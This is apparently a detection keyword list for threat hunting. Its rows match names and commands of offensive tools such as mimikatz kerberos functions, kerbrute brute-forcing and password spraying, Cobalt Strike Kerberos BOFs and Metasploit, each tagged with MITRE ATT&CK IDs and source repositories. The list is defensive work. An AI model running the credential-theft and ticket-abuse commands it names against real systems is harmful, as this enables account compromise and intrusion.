"*kerberos::list*",".{0,1000}kerberos\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::ptc*",".{0,1000}kerberos\:\:ptc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::ptt *.kirbi*",".{0,1000}kerberos\:\:ptt\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*kerberos::ptt*",".{0,1000}kerberos\:\:ptt.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::ptt*",".{0,1000}kerberos\:\:ptt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::ptt*.kirbi*",".{0,1000}kerberos\:\:ptt.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kerberos::purge*",".{0,1000}kerberos\:\:purge.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::tgt*",".{0,1000}kerberos\:\:tgt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos_enumusers.*",".{0,1000}kerberos_enumusers\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kerberos_steal*",".{0,1000}kerberos_steal.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*kerberosv5.py*",".{0,1000}kerberosv5\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Kerbeus * by RalfHacker*",".{0,1000}Kerbeus\s.{0,1000}\sby\sRalfHacker.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kerbeus_cs.cna*",".{0,1000}kerbeus_cs\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kerbeus_havoc.py*",".{0,1000}kerbeus_havoc\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*Kerbeus-BOF-main*",".{0,1000}Kerbeus\-BOF\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kerbrute -*",".{0,1000}kerbrute\s\-.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute bruteuser *",".{0,1000}kerbrute\sbruteuser\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*kerbrute passwordspray *",".{0,1000}kerbrute\spasswordspray\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*kerbrute userenum *",".{0,1000}kerbrute\suserenum\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*kerbrute userenum *",".{0,1000}kerbrute\suserenum\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute*bruteforce*",".{0,1000}kerbrute.{0,1000}bruteforce.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth 
bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute.go*",".{0,1000}kerbrute\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute/cmd*",".{0,1000}kerbrute\/cmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute/util*",".{0,1000}kerbrute\/util.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_*.exe*",".{0,1000}kerbrute_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_darwin_386*",".{0,1000}kerbrute_darwin_386.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_darwin_amd64*",".{0,1000}kerbrute_darwin_amd64.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_enum*",".{0,1000}kerbrute_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerbrute_linux*",".{0,1000}kerbrute_linux.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_pass_output_*",".{0,1000}kerbrute_pass_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerbrute_user_output_*",".{0,1000}kerbrute_user_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" 
"*kerbrute_userpass_wordlist_*",".{0,1000}kerbrute_userpass_wordlist_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerbrute_windows*",".{0,1000}kerbrute_windows.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_windows_386.exe*",".{0,1000}kerbrute_windows_386\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_windows_amd64.exe*",".{0,1000}kerbrute_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute-master*",".{0,1000}kerbrute\-master.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*KerbruteSession*",".{0,1000}KerbruteSession.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth 
bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kernel_shellcode.asm*",".{0,1000}kernel_shellcode\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kernelcallbacktable.x64*",".{0,1000}kernelcallbacktable\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*kernelcallbacktable.x64*",".{0,1000}kernelcallbacktable\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*kernelcallbacktable.x86*",".{0,1000}kernelcallbacktable\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" 